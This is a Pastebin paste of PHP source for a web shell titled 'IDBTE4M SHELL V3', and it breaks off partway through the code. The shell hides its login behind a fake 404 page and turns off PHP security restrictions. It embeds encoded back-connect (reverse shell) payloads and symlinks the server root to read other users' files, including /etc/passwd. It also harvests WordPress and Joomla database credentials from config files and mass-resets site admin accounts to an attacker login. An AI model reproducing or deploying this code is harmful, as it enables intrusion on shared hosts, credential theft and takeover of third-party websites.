Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @session_start();
- @define('SELF_PATH', __FILE__);
- $auth_pass = "608e7dc116de7157306012b4f0be82ac";
- $cookie_hour_expire = 24;
- if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- function printLogin() { ?>
- <html><head><title>404 Not Found</title></head>
- <style>
- input { margin:0;background-color:#fff;border:1px solid #fff; }
- </style>
- <body>
- <h1>Not Found</h1>
- <p>The requested URL <? $_SERVER['PHP_SELF'] ?> was not found on this server.</p>
- <p>Additionally, a 404 Not Found error was encounteblue while trying to use an ErrorDocument to handle the request.</p>
- <hr>
- <form method=post>
- <address><?=$_SERVER['SERVER_SIGNATURE'] ?><center><input type=password name=x><input type=submit value=''></center></address>
- </form></body></html>
- <?php
- exit;
- }
- $cookie_value = md5($_SERVER['HTTP_HOST'] . "dm" . $auth_pass);
- if (isset($_POST['x'])) {
- if (md5($_POST['x']) != $auth_pass) {
- printLogin();
- } else {
- setcookie("dm", $cookie_value, time() + (60 * (60 * $cookie_hour_expire)));
- }
- } elseif (isset($_COOKIE['dm'])) {
- if ($_COOKIE['dm'] != $cookie_value) {
- printLogin();
- }
- } elseif (!isset($_COOKIE['dm'])) {
- printLogin();
- }
- if (isset($_POST['logout'])) {
- setcookie("dm", "", time() - (60 * (60 * 60 * 360000)));
- $page = $host = 'http://' . $_SERVER['SERVER_NAME'] . '/' . $_SERVER['PHP_SELF'];
- echo '<center><span class="b1"> Please Wait ...</scan></center>';
- ?>
- <script>window.location.href = '<?php print $page; ?>';</script>
- <?php exit(0);
- }
- @set_time_limit(0);
- @error_reporting(0);
- @ini_set('log_errors', 0);
- @ini_set('error_log', NULL);
- @ini_restore("safe_mode");
- @ignore_user_abort(FALSE);
- @ini_restore("open_basedir");
- @set_magic_quotes_runtime(0);
- @ini_restore("allow_url_fopen");
- @ini_set('max_execution_time', 0);
- @ini_restore("disable_functions");
- @ini_restore("safe_mode_exec_dir");
- @ini_restore("safe_mode_include_dir");
- @ini_set('zlib.output_compression', 'Off');
- $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
- $u = explode("/",$pageURL );
- $pageURL =str_replace($u[count($u)-1],"",$pageURL );
- $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
- $u = explode("/",$pageFTP );
- $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
- if(get_magic_quotes_gpc()){
- foreach($_POST as $key=>$value){
- $_POST[$key] = stripslashes($value);
- }
- }
- $back_connect="fZFRS8MwF IXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0StktGB8aihs prPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28jS2whVulCf lCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZja3ImclYa gh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92 +rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
- $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29r WhyEzc+Z2TjpSserABYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl9 ? 5 /3Wa43fpotyCABR95zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vK C1rI6wgSmN/niYb75i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVC nim7a/ZuJC0JTwf3ARkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlx iuPB3E0/gXejiHMcYjwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3X Ie1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
- $jumper="3VRRb5swEP4rFwvNRqVAtkmTEiCTpk7aHjppe5rSiBlsilfAyDZrs2r/fefQpM3LfsCEMObuu++7Ox/IutVAMserTkLdcWvzG1L3otIPN6TInMFbQK07O/IBXa/RStbAAttDDmpQ5a10jFreyLLXQtIQ8hzSEDYwQ6huGroCoSQjV8Zos4JvRzC6vwxZ4kSBi/GLT6PIhPp1ykUNjUbNbVlWb969vYN+OSwh89mcILd8z32yHFojm5xuaEHi4OGa9zImWcKR2OMLuBLKKX ? 1dlrssQY0CzpR+zjTwGZ8db+HTIPQgreJ3E7yq9bhfA4kFd5LR7zRyqpcsDGMCz1qwvgxhpibhGqx0pY ? eVneqVYyma3gcjit0LrLzRoxwYTaSrk9lII2ooglQDbPEEDOHR9w4Y2V7u4NBAWMEHPYnhh4Ovkgt4wf ? D/9vIPBONUYdu4MXzP0BJMVhp7Zqn10JwZFL6la7hvVSfZopG6Yce+ho84oM74g8AJtif73H6MLGCZph41 ? aq+CWNwwHxPRFT0mMGCy3jtV6Ji9aeRDPEAo89t/Akmre5nQ+BQR0wSr6VRdtq7vEjqLsmfGBUZRn6O3K1saPGh/nuzA6R2HIstxsu0cZqNTNEq/9KJSNIf5NvorUBcXft9o5K1beGIAbueikF76/wLdftTTIGCxg+NAkM0+PyvnvBRS/MOZHOanMgX14pviLw=="; ?>
- <HTML>
- <HEAD>
- <link href="http://g22b.cc/upload/font.php?file_manager" rel="stylesheet" type="text/css">
- <title>-=[ IDBTE4M ]=-</title>
- <link rel="SHORTCUT ICON" href="http://kefiex.yu.tl/files/bnx.png">
- <body style="background-image: url('http://2.bp.blogspot.com/-LPgZM8E1nKE/VA_RSPtWNvI/AAAAAAAAAu4/Dzs4tTNniFw/s1600/1w2w3.png'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
- <script type="text/javascript" src="jquery-1.10.1.min.js" tppabs="http://code.jquery.com/jquery-1.10.1.min.js"></script>
- <script type="text/javascript">
- $(document).ready(function() {
- $(".flip").click(function() {
- $(".panel").slideToggle("slow");
- });
- });
- </script>
- <style type="text/css">
- div.panel,p.flip {
- margin: 0px;
- padding: 0px;
- text-align: center;
- background: transparent;
- }
- a.panel {
- background: transparent;
- display: none;
- }
- </style>
- </head>
- <style type="text/css">
- a { text-decoration:none; }
- a:hover{ border-bottom:1px solid yellow; }
- *{ font-size:11px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF; }
- #menu{ background:#111111;margin:8px 2px 4px 2px; }
- #menu a{ padding:4px 18px;
- margin:0;
- background:#222222;
- text-decoration:none;
- letter-spacing:2px;
- border-radius: 4px;
- border-bottom:2px solid #444444;
- border-top:2px solid #444444;
- border-right:2px solid blue;
- border-left:2px solid blue;
- }
- #menu a:hover{
- background:#191919;
- border-radius: 7px;
- border-bottom:2px solid #yellow;
- border-top:2px solid #yellow;
- border-right:2px solid #FF0000;
- border-left:2px solid #FF0000;
- }
- .tabnet{ margin:15px auto 0 auto;border: 1px solid #333333; }
- .main {
- width:90%;
- margin:30px auto 10px;
- padding:10px 10px 5px 10px;
- border-radius:5px;
- -moz-border-radius:5px;
- -moz-box-shadow:0px 0px 10px #FFFFFF;
- }
- .gaya { color: blue; }
- .gaya a { color: yellow; }
- .inputz{ background:#111111;
- border:0;
- padding:2px;
- border-bottom:1px solid #FF0000;
- border-top:1px solid #FF0000; }
- .inputzbut{
- background:#111111;
- color:#FF0000;
- margin:0 4px;
- border:1px solid #444444;
- border-bottom:1px solid #FF0000;
- border-top:1px solid #FF0000;
- border-right:1px solid #FF0000;
- border-left:1px solid #FF0000;
- }
- .inputz:hover, .inputzbut:hover{
- border-bottom:1px solid yellow;
- border-top:1px solid yellow;
- }
- .output { margin:auto;
- border:1px solid #FF0000;
- width:100%;
- height:400px;
- background:#000000;
- padding:0 2px; }
- .cmdbox{ width:100%; }
- .head_info{ padding: 0 4px; }
- .dminfox {
- font-size:11px;
- font-family:Tahoma,Verdana,Arial;
- color:yellow;
- }
- .infodmx {
- font-size:11px;
- font-family:Tahoma,Verdana,Arial;
- color:blue;
- }
- .b0{
- font-size:30px;padding:0;color:#444444;
- }
- .b1{
- font-size:25px;padding:0;color:blue;
- }
- .b2{
- font-size:25px;padding:0;color:yellow;
- }
- .b3{
- font-size:10px;padding:0;color:blue;
- }
- .b4{
- font-size:20px;padding:0;color:#FF0000;
- }
- .b5{
- font-size:20px;padding:0;color:#FFFFFF;
- }
- .b6{
- font-size:20px;padding:0;color:#00FF00;
- }
- .b7{
- font-size:20px;padding:0;color:blue;
- }
- .b8{
- font-size:20px;padding:0;color:yellow;
- }
- .b9{
- font-size:20px;padding:0;color:yellow;
- }
- .b10{
- font-size:20px;padding:0;color:#444444;
- }
- .b11{
- font-size:10px;padding:0;color:yellow;
- }
- .b12{
- font-size:10px;padding:0;color:#444444;
- }
- .b_tbl{ text-align:center;
- margin:0 1px 0 0;
- padding:0 1px 0 0;
- border-right:1px solid #333333; }
- .c_tbl{ text-align:center;
- margin:0 4px 0 0;
- padding:0 4px 0 0;
- border-left:1px solid #333333; }
- .phpinfo table{ width:100%;
- padding:0 0 0 0; }
- .phpinfo td{ background:#191919;
- color:#cccccc;
- padding:6px 8px;; }
- .phpinfo th, th{ background:#111111;
- border-bottom:1px solid #333333;
- font-weight:normal; }
- .phpinfo h2, .phpinfo h2 a{ text-align:center;
- font-size:16px;
- padding:0;
- margin:30px 0 0 0;
- background:#222222;
- padding:4px 0; }
- .explore{ width:100%; }
- .explore a { text-decoration:none; }
- .explore td{ border-bottom:1px solid yellow;
- padding:0 8px;
- line-height:10px; }
- .explore th{ padding:3px 8px;
- font-weight:normal; }
- .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid yellow; }
- .explore tr:hover{ background:#444444;
- cursor:pointer; }
- .viewfile{ background:#EDECEB;
- color:#000000;
- margin:4px 2px;
- padding:8px; }
- .sembunyi{ display:none;
- padding:0;margin:0;}
- .info{ background:#111111;
- width:99%;
- padding:5px;
- margin:10px auto 5px;
- text-align:center;
- font-size:13px;}
- .info a{ font-size:14px;}
- .info span{ font-size:14px;}
- .jaya{ margin:5px; text-align:right; }
- </style>
- </head>
- <center><SCRIPT>
- farbbibliothek = new Array();
- farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
- farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00");
- farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");
- farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
- farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
- farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");
- farbbibliothek[6] = new Array("#0000FF","#FFFF00");
- farben = farbbibliothek[4];
- function farbschrift()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.all["a"+i].style.color=farben[i];
- }
- farbverlauf();
- }
- function string2array(text)
- {
- Buchstabe = new Array();
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- k=0;
- while(k<=text.length)
- {
- Buchstabe[k] = text.charAt(k);
- k++;
- }
- }
- function divserzeugen()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.write("<font face='monotype corsiva' size=30><span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span></font>");
- }
- farbschrift();
- }
- var a=1;
- function farbverlauf()
- {
- for(var i=0 ; i<farben.length; i++)
- {
- farben[i-1]=farben[i];
- }
- farben[farben.length-1]=farben[-1];
- setTimeout("farbschrift()",30);
- }
- var farbsatz=1;
- function farbtauscher()
- {
- farben = farbbibliothek[farbsatz];
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
- }
- setInterval("farbtauscher()",5000);
- text= "-=[+] IDBTE4M SHELL V3 [+]=- ";
- </script><span class='newclass'>
- <script type="text/javascript">
- string2array(text);
- divserzeugen();
- </script></span></center></tbody></table><br/>
- <script type="text/javascript">
- function tukar(lama,baru){ document.getElementById(lama).style.display = "none"; document.getElementById(baru).style.display = "block"; } </script> <table border="1"><tbody>
- <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- <center>
- <tr><td>
- <center>
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><nobr><b></b><a href="?">-=[ HOME </a></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&x=php">EVAL</a></b></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&x=mysql">SQL 1</a></b></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">INFO</a></b></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&x=netsploit">SPLOIT</a></b></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?idb=salto">SALTO ]=-</a></b></nobr></td>
- </tr></table></div>
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "y=".$pwd; ?>&x=shell">-=[ SHELL</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?sws=sym">SYM1</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?idb=domain">Domain</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?sws=file">Manual</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?sws=passwd">Bypass</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?idb=auto">Auto ]=-</a></b></td>
- </tr></table></div>
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><b><a href="?sws=joomla">-=[ Joomla</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?sws=wp">WordPress</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?sws=vb">vBulletin</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?idb=sql">SQL2</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?idb=config">CONFIG</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?idb=cp">CP++ ]=-</a></b></td>
- </tr></table></div>
- </center>
- <p>
- <center>
- <div class="mg">
- <?php
- if(is_readable("/etc/named.conf")){
- echo '-=[ <a href="?do=etc_named.conf" ><font color="green">/etc/named.conf</font> ]-';
- }else{
- echo '-[ <font color="blue">/etc/named.conf</font> ]-';
- }
- if(is_readable("/etc/passwd")){
- echo '-[ <a href="?do=etc_passwd" ><font color="green">/etc/passwd</font> ]-';
- }else{
- echo '-[ <font color="blue">/etc/passwd</font> ]-';
- }
- if(is_readable("/etc/valiases")){
- echo '-[ <a href="?do=etc_valiases" ><font color="green">/etc/valiases exists</font> ]-';
- }else{
- echo '-[ <font color="blue">/etc/valiases</font> ]-';
- }
- if(is_readable("/var/named")){
- echo '-[ <a href="?do=var_named" ><font color="green">/var/named</font> ]=-';
- }else{
- echo '-[ <font color="blue">/var/named</font> ]=-';
- }
- ?></center>
- </div></div> </tr></table></tbody></table> </div>
- <?php
- @mkdir('empek',0777);
- $htcs = "Options Indexes FollowSymLinks\nDirectoryIndex amis.txt\nAddType txt .php\nAddHandler txt .php";
- $f =@fopen ('empek/.htaccess','w');
- fwrite($f , $htcs);
- @symlink("/","empek/amis.txt");
- $pg = basename(__FILE__);
- @mkdir('idb',0777);
- $htcs = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- $f =@fopen ('idb/.htaccess','w');
- fwrite($f , $htcs);
- @symlink("/","idb/te4m");
- $pg = basename(__FILE__);
- if(isset($_REQUEST['sws']))
- {
- switch ($_REQUEST['sws'])
- {
- /// user + domine + symlink ///
- case 'sym':
- if(!is_file('named.txt')){
- $d00m = @file("/etc/named.conf");
- }else{
- $d00m = @file("named.txt");
- }
- if(!$d00m)
- {
- die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- }
- else
- {
- echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
- foreach($d00m as $dom){
- if(eregi("zone",$dom)){
- preg_match_all('#zone "(.*)"#', $dom, $domsws);
- flush();
- if(strlen(trim($domsws[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
- flush();
- $site = $user['name'] ;
- @symlink("/","empek/amis.txt");
- $site = $domsws[1][0];
- $ir = 'ir';
- $il = 'il';
- if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
- {
- $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px blue; '>".$domsws[1][0]."</div>";
- }
- echo "
- <tr>
- <td>
- <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
- </td>
- <td>
- ".$user['name']."
- </td>
- <td>
- <a href='empek/amis.txt/home/".$user['name']."/public_html' target='_blank'>symlink </a>
- </td>
- </tr></div> ";
- flush();
- flush();
- }
- }
- }
- }
- break;
- /// file symlink ///
- case 'file':
- echo'
- The file path to symlink
- <br /><br />
- <form method="post">
- <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
- <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
- <input type="submit" value="symlink" name="symlink" /> <br /><br />
- </form>
- ';
- $pfile = $_POST['file'];
- $symfile = $_POST['symfile'];
- $symlink = $_POST['symlink'];
- if ($symlink)
- {
- @mkdir('sym1',0777);
- $c = "Options Indexes FollowSymLinks\nDirectoryIndex tr.phtml\nAddType txt .php\nAddHandler txt .php";
- $f =@fopen ('sym1/.htaccess','w');
- @fwrite($f , $c);
- @symlink("$pfile","sym1/$symfile");
- echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
- }
- break;
- /// bypass read
- case 'read':
- echo "read /etc/named.conf";
- echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
- flush();
- flush();
- $file = '/etc/named.conf';
- $r3ad = @fopen($file, 'r');
- if ($r3ad){
- $content = @fread($r3ad, @filesize($file));
- echo "".htmlentities($content)."";
- }
- else if (!$r3ad)
- {
- $r3ad = @show_source($file) ;
- }
- else if (!$r3ad)
- {
- $r3ad = @highlight_file($file);
- }
- else if (!$r3ad)
- {
- $sm = @symlink($file,'sym.txt');
- if ($sm){
- $r3ad = @fopen('empek/sym.txt', 'r');
- $content = @fread($r3ad, @filesize($file));
- echo "".htmlentities($content)."";
- }
- }
- echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
- if(isset($_GET['save'])){
- $cont = stripcslashes($_POST['file']);
- $f = fopen('named.txt','w');
- $w = fwrite($f,$cont);
- if($w){
- echo '<br />save has been successfully';
- }
- fclose($f);
- }
- break;
- // passwd
- case 'passwd':
- if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
- $cont = stripcslashes($_POST['file']);
- if(!file_exists('passwd.txt')){
- $f = @fopen('passwd.txt','w');
- $w = @fwrite($f,$cont);
- fclose($f);
- }
- if($w or @filesize('passwd.txt') > 0){
- // * SHOW * //
- echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
- flush();
- $fil3 = file('passwd.txt');
- foreach ($fil3 as $f){
- $u=explode(':', $f);
- $user = $u['0'];
- echo "
- <tr>
- <td width='15%'>
- $user
- </td>
- <td width='10%'>
- <a href='empek/amis.txt/home/$user/public_html' target='_blank'>Symlink </a>
- </td>
- <td width='10%'>
- <a href='$pageFTP/empek/amis.txt/home/$user/public_html' target='_blank'>FTP</a>
- </td>
- </tr></div> ";
- flush();
- flush();
- }
- die ("</tr></div>");
- }
- }
- echo "read /etc/passwd";
- echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
- flush();
- $file = '/etc/passwd';
- $r3ad = @fopen($file, 'r');
- if ($r3ad){
- $content = @fread($r3ad, @filesize($file));
- echo "".htmlentities($content)."";
- }
- elseif(!$r3ad)
- {
- $r3ad = @show_source($file) ;
- }
- elseif(!$r3ad)
- {
- $r3ad = @highlight_file($file);
- }
- elseif(!$r3ad)
- {
- for($uid=0;$uid<1000;$uid++){
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list ($key, $val) = each($ara)){
- print "$val:";
- }
- print "\n";
- }
- }
- }
- flush();
- echo "</textarea><br /><br /><input type='submit' value=' symlink '/> </form>";
- flush();
- break;
- case 'joomla':
- /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
- if(isset($_POST['s'])){
- $file = @file_get_contents('joomla.txt');
- $ex = explode("\n",$file);
- echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
- flush();
- foreach ($ex as $exp){
- $es = explode("||",$exp);
- $config = $es[0];
- $domin = $es[1];
- $domins = trim($domin).'';
- $readconfig = @file_get_contents(trim($config));
- if(ereg('JConfig',$readconfig)){
- $pass = ex($readconfig,'$password = \'',"';");
- $userdb = ex($readconfig,'$user = \'',"';");
- $db = ex($readconfig,'$db = \'',"';");
- $fix = ex($readconfig,'$dbprefix = \'',"';");
- $tab = $fix.'users';
- $con = @mysql_connect('localhost',$userdb,$pass);
- $db = @mysql_select_db($db,$con);
- $query = @mysql_query("UPDATE `$tab` SET `username` ='sec-w.com'");
- $query3 = @mysql_query("UPDATE `$tab` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
- if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:blue">failed</b>';}
- $domins = trim($domin).'';
- echo "<tr>
- <td><a target='_blank' href='http://$domins'>$domin</a></td>
- <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
- flush();
- }else{
- echo "<tr>
- <td><a target='_blank' href='http://$domins'>$domin</a></td>
- <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:blue'>failed</tr>";
- flush();
- }
- }
- die();
- }
- if(!is_file('named.txt')){
- $d00m = @file("/etc/named.conf");
- flush();
- }else{
- $d00m = file("named.txt");
- }
- if(!$d00m)
- {
- die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- }
- else
- {
- echo "<div class='tmp'>
- <form method='POST' action='$pg?sws=joomla'>
- <input type='submit' value='Mass ching Admin' />
- <input type='hidden' value='1' name='s' />
- </form><br /><br />
- <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
- $f = fopen('joomla.txt','w');
- foreach($d00m as $dom){
- if(eregi("zone",$dom)){
- preg_match_all('#zone "(.*)"#', $dom, $domsws);
- if(strlen(trim($domsws[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
- ///////////////////////////////////////////////////////////////////////////////////
- $wpl=$pageURL."idb/te4m/home/".$user['name']."/public_html/configuration.php";
- $wpp=get_headers($wpl);
- $wp=$wpp[0];
- $wp2=$pageURL."idb/te4m/home/".$user['name']."/public_html/blog/configuration.php";
- $wpp2=get_headers($wp2);
- $wp12=$wpp2[0];
- $wp3=$pageURL."idb/te4m/home/".$user['name']."/public_html/joomla/configuration.php";
- $wpp3=get_headers($wp3);
- $wp13=$wpp3[0];
- ////////// joomla ////////////
- $pos = strpos($wp, "200");
- $config=" ";
- if (strpos($wp, "200") == true )
- {
- $config= $wpl;
- }
- elseif (strpos($wp12, "200") == true)
- {
- $config= $wp2;
- }
- elseif (strpos($wp13, "200") == true)
- {
- $config= $wp3;
- }
- else
- {
- continue;
- }
- flush();
- /////////////////////////////////////////////////////////////////////////////////////
- $dom = $domsws[1][0];
- $w = fwrite($f,"$config||$dom \n");
- if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:blue">failed</b>';}
- echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
- <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
- flush();
- }
- }
- }
- }
- break;
- case 'wp':
- ############################ index #########################3
- ######## admin ##########33
- if(isset($_POST['s'])){
- $file = @file_get_contents('wp.txt');
- $ex = explode("\n",$file);
- echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
- flush();
- flush();
- foreach ($ex as $exp){
- $es = explode("||",$exp);
- $config = $es[0];
- $domin = $es[1];
- $domins = trim($domin).'';
- $readconfig = @file_get_contents(trim($config));
- if(ereg('wp-settings.php',$readconfig)){
- $pass = ex($readconfig,"define('DB_PASSWORD', '","');");
- $userdb = ex($readconfig,"define('DB_USER', '","');");
- $db = ex($readconfig,"define('DB_NAME', '","');");
- $fix = ex($readconfig,'$table_prefix = \'',"';");
- $tab = $fix.'users';
- $con = @mysql_connect('localhost',$userdb,$pass);
- $db = @mysql_select_db($db,$con);
- $query = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
- $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
- if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
- else
- {
- $r = '<b style="color:blue">failed</b>';
- }
- $domins = trim($domin).'';
- echo "<tr>
- <td><a target='_blank' href='http://$domins'>$domin</a></td>
- <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
- flush();
- flush();
- }else{
- echo "<tr>
- <td><a target='_blank' href='http://$domins'>$domin</a></td>
- <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:blue'>failed2</tr>";
- flush();
- flush();
- }
- }
- die();
- }
- if(!is_file('named.txt')){
- $d00m = @file("/etc/named.conf");
- }else{
- $d00m = @file("named.txt");
- }
- if(!$d00m)
- {
- die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- }
- else
- {
- echo "<div class='tmp'>
- <form method='POST' action='$pg?sws=wp'>
- <input type='submit' value='Mass Change Admin' />
- <input type='hidden' value='1' name='s' />
- </form>
- <br /><br />
- <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
- flush();
- flush();
- $f = fopen('wp.txt','w');
- foreach($d00m as $dom){
- if(eregi("zone",$dom)){
- preg_match_all('#zone "(.*)"#', $dom, $domsws);
- if(strlen(trim($domsws[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
- ///////////////////////////////////////////////////////////////////////////////////
- $wpl=$pageURL."idb/te4m/home/".$user['name']."/public_html/wp-config.php";
- $wpp=get_headers($wpl);
- $wp=$wpp[0];
- $wp2=$pageURL."idb/te4m/home/".$user['name']."/public_html/blog/wp-config.php";
- $wpp2=get_headers($wp2);
- $wp12=$wpp2[0];
- $wp3=$pageURL."idb/te4m/home/".$user['name']."/public_html/wp/wp-config";
- $wpp3=get_headers($wp3);
- $wp13=$wpp3[0];
- ////////// wp ////////////
- $pos = strpos($wp, "200");
- $config=" ";
- if (strpos($wp, "200") == true )
- {
- $config= $wpl;
- }
- elseif (strpos($wp12, "200") == true)
- {
- $config= $wp2;
- }
- elseif (strpos($wp13, "200") == true)
- {
- $config= $wp3;
- }
- else
- {
- continue;
- }
- flush();
- /////////////////////////////////////////////////////////////////////////////////////
- $dom = $domsws[1][0];
- $w = fwrite($f,"$config||$dom \n");
- if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:blue">failed</b>';}
- echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
- <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
- flush();
- flush();
- flush();
- }
- }
- }
- }
- break;
- case 'vb':
- if(isset($_POST['s'])){
- $file = @file_get_contents('vb.txt');
- $ex = explode("\n",$file);
- echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
- foreach ($ex as $exp){
- $es = explode("||",$exp);
- $config = $es[0];
- $domin = $es[1];
- $domins = trim($domin).'';
- $readconfig = @file_get_contents(trim($config));
